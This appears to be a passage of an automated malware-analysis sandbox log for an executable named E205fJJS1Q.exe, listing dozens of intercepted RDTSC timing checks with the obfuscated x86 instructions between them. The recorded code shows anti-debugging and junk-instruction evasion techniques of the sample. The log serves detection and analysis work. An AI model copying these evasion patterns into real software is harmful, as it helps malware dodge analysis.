Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169CFF0 second address: 169CFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2274C03996h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169CFFC second address: 169D001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16669F4 second address: 1666A0B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnl 00007F2274C0399Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1666A0B second address: 1666A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F22757AEC24h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1666A27 second address: 1666A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1666A2F second address: 1666A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169C5B4 second address: 169C5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F2274C03996h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169C5C4 second address: 169C5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169C5CA second address: 169C5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F2274C039A4h 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169C861 second address: 169C869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169C869 second address: 169C873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169C873 second address: 169C898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F22757AEC28h 0x0000000c jns 00007F22757AEC16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169CBB1 second address: 169CBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2274C0399Bh 0x00000009 jmp 00007F2274C0399Ch 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169CE7D second address: 169CE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169D747 second address: 169D760 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2274C03996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jnp 00007F2274C03996h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169D87D second address: 169D8BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F22757AEC22h 0x00000013 popad 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169D8BB second address: 169D8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169D8C2 second address: 169D8C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169DD2D second address: 169DD37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169DF48 second address: 169DF4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169DFF1 second address: 169DFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169E4CD second address: 169E4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169E4D1 second address: 169E4D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169E4D5 second address: 169E4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jne 00007F22757AEC18h 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F22757AEC16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169E5CE second address: 169E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169E78C second address: 169E79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F22757AEC16h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169E79A second address: 169E7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169EA14 second address: 169EA1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169EA1A second address: 169EA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169EA1E second address: 169EA22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A1349 second address: 16A135D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2274C0399Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A135D second address: 16A1361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A1361 second address: 16A1365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A1365 second address: 16A1372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A1372 second address: 16A1376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A1376 second address: 16A13C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F22757AEC18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F22757AEC18h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 xchg eax, ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 pushad 0x00000045 popad 0x00000046 pop eax 0x00000047 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A13C5 second address: 16A13CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2274C03996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A13CF second address: 16A13EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F22757AEC25h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A29DE second address: 16A2A5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F2274C0399Dh 0x0000000c pop edx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F2274C03998h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov esi, dword ptr [ebp+122D36BDh] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F2274C03998h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d pushad 0x0000004e mov esi, dword ptr [ebp+122D28C5h] 0x00000054 mov dword ptr [ebp+122D2B56h], ecx 0x0000005a popad 0x0000005b push 00000000h 0x0000005d xor di, A483h 0x00000062 push eax 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 jne 00007F2274C03996h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A2A5B second address: 16A2A69 instructions: 0x00000000 rdtsc 0x00000002 je 00007F22757AEC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A2A69 second address: 16A2A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A3501 second address: 16A3505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A3505 second address: 16A3509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A3509 second address: 16A350F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A350F second address: 16A3519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F2274C03996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A4FA1 second address: 16A4FA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1650D38 second address: 1650D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1650D3D second address: 1650D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F22757AEC28h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1650D5A second address: 1650D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2274C03996h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1650D6C second address: 1650D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A88C1 second address: 16A88CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F2274C03996h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A88CC second address: 16A892C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D2B69h], edx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F22757AEC18h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c jo 00007F22757AEC25h 0x00000032 call 00007F22757AEC1Ch 0x00000037 pushad 0x00000038 popad 0x00000039 pop edi 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D3344h], esi 0x00000042 xor ebx, 776C99F1h 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c push edx 0x0000004d pop edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A892C second address: 16A8930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A5F2E second address: 16A5F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A5F32 second address: 16A5F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jg 00007F2274C03996h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A991D second address: 16A99A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 js 00007F22757AEC2Dh 0x0000000d push eax 0x0000000e jmp 00007F22757AEC25h 0x00000013 pop eax 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D2DBCh], esi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F22757AEC18h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov bx, E392h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F22757AEC18h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 0000001Dh 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 clc 0x00000058 mov edi, dword ptr [ebp+122D3246h] 0x0000005e xchg eax, esi 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F22757AEC1Ch 0x00000067 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A99A9 second address: 16A99AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A99AD second address: 16A99B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A99B7 second address: 16A99BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16AA921 second address: 16AA986 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add bh, 0000004Dh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F22757AEC18h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b or dword ptr [ebp+122D2A3Ch], esi 0x00000031 and ebx, dword ptr [ebp+122D354Dh] 0x00000037 push 00000000h 0x00000039 movsx ebx, bx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f je 00007F22757AEC1Ch 0x00000045 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16AA986 second address: 16AA9A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2274C039A6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A9B22 second address: 16A9B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16AC8E1 second address: 16AC8EB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2274C03996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16ADACE second address: 16ADAD8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F22757AEC1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16ACAD9 second address: 16ACADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16AFA5F second address: 16AFAAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F22757AEC24h 0x0000000f jns 00007F22757AEC16h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F22757AEC24h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B00C7 second address: 16B00CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B00CB second address: 16B00D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B00D4 second address: 16B00DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B00DA second address: 16B00F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007F22757AEC1Eh 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B00F3 second address: 16B00FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F2274C03996h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16ADCBC second address: 16ADCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F22757AEC2Eh 0x0000000f jmp 00007F22757AEC28h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16ADCE3 second address: 16ADD84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2274C039A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add dword ptr [ebp+122D2F67h], edi 0x00000010 push edi 0x00000011 mov dword ptr [ebp+1247FF35h], ebx 0x00000017 pop ebx 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov dword ptr [ebp+1247FECCh], ecx 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F2274C03998h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 sbb bx, 142Bh 0x0000004b jmp 00007F2274C039A8h 0x00000050 mov bl, 47h 0x00000052 mov eax, dword ptr [ebp+122D1465h] 0x00000058 je 00007F2274C0399Bh 0x0000005e mov edi, 6AB659C7h 0x00000063 push FFFFFFFFh 0x00000065 mov di, 5501h 0x00000069 nop 0x0000006a pushad 0x0000006b push edi 0x0000006c pushad 0x0000006d popad 0x0000006e pop edi 0x0000006f jbe 00007F2274C0399Ch 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B22BC second address: 16B22C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B22C0 second address: 16B22C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1657853 second address: 1657857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1657857 second address: 1657872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2274C039A1h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B28D0 second address: 16B28D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16B28D5 second address: 16B28DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
